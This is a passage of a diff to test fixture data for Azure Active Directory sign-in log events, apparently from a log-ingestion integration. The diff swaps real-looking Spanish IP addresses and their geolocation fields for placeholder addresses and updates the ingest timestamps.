Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970086Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -416,25 +362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -448,7 +376,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -498,7 +426,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -510,12 +438,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051488700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970091700Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -554,25 +482,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -586,7 +496,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -636,7 +546,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -648,12 +558,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051491600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970097400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -692,25 +602,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -724,7 +616,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -774,7 +666,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -786,12 +678,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051494500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970103200Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -830,25 +722,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -862,7 +736,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -912,7 +786,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -924,12 +798,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051497400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970108800Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -968,25 +842,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1000,7 +856,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -1050,7 +906,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -1062,12 +918,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051500500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970114500Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1106,25 +962,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1138,7 +976,7 @@ 